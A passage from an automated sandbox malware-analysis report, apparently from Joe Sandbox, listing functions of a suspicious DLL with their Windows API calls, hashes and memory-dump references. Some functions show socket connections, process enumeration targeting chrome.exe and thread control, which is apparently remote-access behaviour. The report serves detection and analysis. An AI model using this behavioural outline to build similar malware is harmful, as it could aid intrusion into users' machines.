                                                          • API ID: Local$Free$InfoSizeSleepUsermbstowcs
                                                          • String ID:
                                                          • API String ID: 2733533-0
                                                          • Opcode ID: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                          • Instruction ID: 15c901b137dd358fda9146c8f6f94cc6f523190a05e50031364fc71d2f867a2a
                                                          • Opcode Fuzzy Hash: 6a9604ccc34c4b0797383264fcae3a00f4c44b13357fa65a3340c00f3e20fbd0
                                                          • Instruction Fuzzy Hash: 02110835218301ABE714CB28DC85FDB77D9AFD8705F044A2DF585822D1EBB4E54C8693
                                                          Function 100049A0 Relevance: 6.0, APIs: 4, Instructions: 47synchronizationnetworkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                          • CloseHandle.KERNEL32(?), ref: 100049FF
                                                          • CloseHandle.KERNEL32(?), ref: 10004A08
                                                          • WSACleanup.WS2_32 ref: 10004A0A
                                                            • Part of subcall function 10004F20: setsockopt.WS2_32(?,0000FFFF,00000080,00000000), ref: 10004F4A
                                                            • Part of subcall function 10004F20: CancelIo.KERNEL32(?), ref: 10004F57
                                                            • Part of subcall function 10004F20: InterlockedExchange.KERNEL32(?,00000000), ref: 10004F66
                                                            • Part of subcall function 10004F20: closesocket.WS2_32(?), ref: 10004F73
                                                            • Part of subcall function 10004F20: SetEvent.KERNEL32(?), ref: 10004F80
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandle$CancelCleanupEventExchangeInterlockedObjectSingleWaitclosesocketsetsockopt
                                                          • String ID:
                                                          • API String ID: 136543108-0
                                                          • Opcode ID: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                          • Instruction ID: af8d02120cf7308e6d709f2e7e2ecce89aa86b165303e1ddd931105c7dc64684
                                                          • Opcode Fuzzy Hash: c40254e04adc77fad543b95add6b34e372d7ac014e393a6428c3a2a647f4d71d
                                                          • Instruction Fuzzy Hash: B811BF79008B41DFD324DF28C844B9AB7E8EF85620F044B1CF0AA432D1DBB864098B63
                                                          Function 10011E20 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E47
                                                          • #940.MFC42(?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E7E
                                                          • #535.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011E8F
                                                          • #800.MFC42(?,?,?,?,?,1009881F,000000FF,10007B21,?,00000000,00000000), ref: 10011EA5
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #535#537#800#940
                                                          • String ID:
                                                          • API String ID: 1382806170-0
                                                          • Opcode ID: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                          • Instruction ID: 1b94c52f3496be9ecc741279a921140b636ff9e4308d57c3df3fe77fcebb6b55
                                                          • Opcode Fuzzy Hash: 6f5b847d5374a9d418dd2c0dc61e1757aeba104c962d883d24d17fcf50d4bf0c
                                                          • Instruction Fuzzy Hash: E2018B7550C7429FD304DF18C850B9BBBE1EB95764F408A0DF895872A2DB74E84A8B92
                                                          Function 100115C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #536#537#800#922
                                                          • String ID:
                                                          • API String ID: 1475696894-0
                                                          • Opcode ID: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                          • Instruction ID: 1cf16686c75a57ace72aecc56e9772a672cb7b67628aacae2db0a16f8193c9c6
                                                          • Opcode Fuzzy Hash: 7d1a2c313bb10d832db081e31ac023a115b9d5a741b1015456ccb2ce16f95c01
                                                          • Instruction Fuzzy Hash: 2301B5B6204650AFC304DF58DD01F9AF7E4FB88B14F408A2DF98997781C779A904CB92
                                                          Function 1002CB60 Relevance: 6.0, APIs: 4, Instructions: 37networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • socket.WS2_32(00000002,00000001,00000000), ref: 1002CB6A
                                                          • htons.WS2_32 ref: 1002CB92
                                                          • connect.WS2_32(00000000,?,00000010), ref: 1002CBA5
                                                          • closesocket.WS2_32(00000000), ref: 1002CBB1
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: closesocketconnecthtonssocket
                                                          • String ID:
                                                          • API String ID: 3817148366-0
                                                          • Opcode ID: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                          • Instruction ID: e8f6fcb377fdd042e502e5b9bb1bca880f3579ad8180536aff2f54e253c3389a
                                                          • Opcode Fuzzy Hash: eb37e080dc3f1f8ccbdf2bbb095a56ed3045b64092a9622a6cfcea14b4e0b0e5
                                                          • Instruction Fuzzy Hash: E0F0F6385143306BE700EB7C9C8AADBB7E4FF84324F844B49F9A8822E1E27084045786
                                                          Function 1002C320 Relevance: 6.0, APIs: 4, Instructions: 33stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • WTSQuerySessionInformationA.WTSAPI32(00000000,000000FF,00000005,?,?), ref: 1002C33C
                                                          • #823.MFC42(00000100,771B1760,00000000,000000FF,00000005,?,?), ref: 1002C34B
                                                          • lstrcpyA.KERNEL32(00000000,?,?), ref: 1002C35B
                                                          • WTSFreeMemory.WTSAPI32(?), ref: 1002C366
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: #823FreeInformationMemoryQuerySessionlstrcpy
                                                          • String ID:
                                                          • API String ID: 3008764780-0
                                                          • Opcode ID: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                          • Instruction ID: 0e0dc6ce2e22f62c944f194f199933a30fb1a1041a33420a8a3a97c55cf99f31
                                                          • Opcode Fuzzy Hash: 0d88bfbc678714cad99cd30844ed1c893ef2e85d3cf852497a73032b9528ba91
                                                          • Instruction Fuzzy Hash: F9F0A7B96083116BDB00DB78AC46D9B76E4EB84A11F444A2CF948D2280F574ED08C7F2
                                                          Function 1000B570 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • Process32First.KERNEL32(?,00000128), ref: 1000B5B7
                                                          • Process32Next.KERNEL32(?,00000128), ref: 1000B5D5
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$FirstNext
                                                          • String ID: ???
                                                          • API String ID: 1173892470-1053719742
                                                          • Opcode ID: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                          • Instruction ID: f3f52207799e89cd2a562506939f2cbbbb926e58e4282d7ba594e292c06b3d7f
                                                          • Opcode Fuzzy Hash: 712854ab25addc2021797cccdb898ca77ef716bf3bd6518fcb4f01374f701812
                                                          • Instruction Fuzzy Hash: CE010432205A040BD728D9399C419AFB7D6EFC43A0F91462DF826C32C4DF78DE08C691
                                                          Function 1000D870 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000D897
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • Sleep.KERNEL32(000003E8), ref: 1000D8A9
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                            • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                            • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                            • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                          • String ID: chrome.exe
                                                          • API String ID: 294463573-2619149582
                                                          • Opcode ID: 0b923ca6a4e2f88d7d96e8bfc8c2d5dd978af23cb480b207e42af5e9afd1fb9c
                                                          • Instruction ID: 3c9e31baa70dc140382364822bbe701dbdbfe9f61172b2a847d5dac191279a67
                                                          • Opcode Fuzzy Hash: 0b923ca6a4e2f88d7d96e8bfc8c2d5dd978af23cb480b207e42af5e9afd1fb9c
                                                          • Instruction Fuzzy Hash: B2117FB80086C19FE324DB64D951BDFB7E0EB95750F404A2DE8A9432C1DF342504CBA3
                                                          Function 1000D970 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51sleepCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • #537.MFC42(chrome.exe), ref: 1000D997
                                                            • Part of subcall function 1000BBB0: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 1000BBDA
                                                            • Part of subcall function 1000BBB0: Process32First.KERNEL32(00000000), ref: 1000BBEF
                                                            • Part of subcall function 1000BBB0: #4202.MFC42(00000000), ref: 1000BC03
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC0E
                                                            • Part of subcall function 1000BBB0: #537.MFC42(?,00000000,00000000,00000000), ref: 1000BC24
                                                            • Part of subcall function 1000BBB0: #4202.MFC42 ref: 1000BC35
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF), ref: 1000BC78
                                                            • Part of subcall function 1000BBB0: #800.MFC42(000000FF), ref: 1000BC88
                                                            • Part of subcall function 1000BBB0: Process32Next.KERNEL32(00000000,00000000), ref: 1000BC93
                                                            • Part of subcall function 1000BBB0: #5572.MFC42(000000FF,00000000,00000000,00000000), ref: 1000BCA9
                                                            • Part of subcall function 1000BBB0: #800.MFC42 ref: 1000BCC0
                                                          • Sleep.KERNEL32(000003E8), ref: 1000D9A9
                                                            • Part of subcall function 100048B0: WSAStartup.WS2_32(00000202,?), ref: 1000491D
                                                            • Part of subcall function 100048B0: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000), ref: 1000492B
                                                            • Part of subcall function 10004A60: ResetEvent.KERNEL32(?,?,00000000), ref: 10004A73
                                                            • Part of subcall function 10004A60: socket.WS2_32 ref: 10004A86
                                                            • Part of subcall function 100049A0: WaitForSingleObject.KERNEL32(?,000000FF,00000000,00000000,?,00000000,10097CDC,000000FF,1001DDF6), ref: 100049DC
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 100049FF
                                                            • Part of subcall function 100049A0: CloseHandle.KERNEL32(?), ref: 10004A08
                                                            • Part of subcall function 100049A0: WSACleanup.WS2_32 ref: 10004A0A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: Process32$#4202#537#5572#800CloseCreateEventHandleNext$CleanupFirstObjectResetSingleSleepSnapshotStartupToolhelp32Waitsocket
                                                          • String ID: chrome.exe
                                                          • API String ID: 294463573-2619149582
                                                          • Opcode ID: a3bf4097e784261b91ddcf7ea40fef9d357ef230353b20bc5f1e0423c08d4705
                                                          • Instruction ID: 6df5605ec276e19eb7803e45be2ef211e296bf8dbfa20a696685d1199e120a8d
                                                          • Opcode Fuzzy Hash: a3bf4097e784261b91ddcf7ea40fef9d357ef230353b20bc5f1e0423c08d4705
                                                          • Instruction Fuzzy Hash: EC117F781086C09BE324DB64DA51BDFB7E0EB95750F404A2DE8A9432C1DF382504CBA3
                                                          Function 10024660 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 25networkCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 1002CDD0: Sleep.KERNEL32(00000064,?,?), ref: 1002CDE1
                                                            • Part of subcall function 1002CDD0: wsprintfA.USER32 ref: 1002CE0C
                                                            • Part of subcall function 1002CDD0: closesocket.WS2_32(00000000), ref: 1002CE24
                                                            • Part of subcall function 1002CDD0: TerminateThread.KERNEL32(?,00000000), ref: 1002CE5C
                                                            • Part of subcall function 1002CDD0: CloseHandle.KERNEL32(1012E1E4), ref: 1002CE63
                                                          • gethostbyname.WS2_32(1012B938), ref: 10024678
                                                          • inet_ntoa.WS2_32(?), ref: 1002469B
                                                            • Part of subcall function 1002CC90: _snprintf.MSVCRT ref: 1002CCCF
                                                            • Part of subcall function 1002CC90: recv.WS2_32(00000000,?,00000002,00000000), ref: 1002CD31
                                                            • Part of subcall function 1002CC90: CreateThread.KERNEL32(00000000,00000000,1002CBF0,?,00000000,?), ref: 1002CD80
                                                            • Part of subcall function 1002CC90: CloseHandle.KERNEL32(00000000), ref: 1002CD94
                                                            • Part of subcall function 1002CC90: closesocket.WS2_32(00000000), ref: 1002CDB1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CloseHandleThreadclosesocket$CreateSleepTerminate_snprintfgethostbynameinet_ntoarecvwsprintf
                                                          • String ID: 127.0.0.1
                                                          • API String ID: 4129115345-3619153832
                                                          • Opcode ID: 482842914eaffcd2ab54d6bed2b60c42a75b80031d3a10fdf504d639132e7dad
                                                          • Instruction ID: cd5f09b4395b623b83a3aabc3bfd33f5180e181e21a3f489f49100e2e3f4e5ff
                                                          • Opcode Fuzzy Hash: 482842914eaffcd2ab54d6bed2b60c42a75b80031d3a10fdf504d639132e7dad
                                                          • Instruction Fuzzy Hash: BCE0ED7A2106109BC214DBA8E884DEB77E5FBDC710B04855DF94AD7211C6347841C761
                                                          Function 10001C80 Relevance: 5.1, APIs: 4, Instructions: 69COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • EnterCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001C8E
                                                          • LeaveCriticalSection.KERNEL32(?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001CA4
                                                          • memmove.MSVCRT(?,?,00000000,?,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000), ref: 10001CF5
                                                          • LeaveCriticalSection.KERNEL32(?,00000000,?,?,?,10004E03,?,00000003,00000003,00000000,?,10004C8B,?,00000000,?), ref: 10001D1B
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727543595.00000000100FA000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727602477.000000001011E000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727635219.0000000010120000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727675286.000000001019A000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_5_2_10000000_loaddll32.jbxd
                                                          Yara matches
                                                          Similarity
                                                          • API ID: CriticalSection$Leave$Entermemmove
                                                          • String ID:
                                                          • API String ID: 72348100-0
                                                          • Opcode ID: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                          • Instruction ID: 50b30369da4871338d3e5076dbae6429fca2f6132d25b88ab6d76ff2db9ab769
                                                          • Opcode Fuzzy Hash: b2c8c82c961791ae8f53fef40cbf23f5f2d1006caee183a225647bbe481849f1
                                                          • Instruction Fuzzy Hash: AE11BF3A3042154FAB08EF749C858EFB799FF94290704452EF907CB346DB71ED0886A0
                                                          Function 100089EE Relevance: 5.0, APIs: 4, Instructions: 50stringCOMMON
                                                          Download Yara Rule
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000005.00000002.3727144721.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000005.00000002.3727083203.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100B7000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100C8000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100D9000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                          • Associated: 00000005.00000002.3727332970.00000000100EA000.00000002.00000001.01000000.00000004.sdmpDownload File
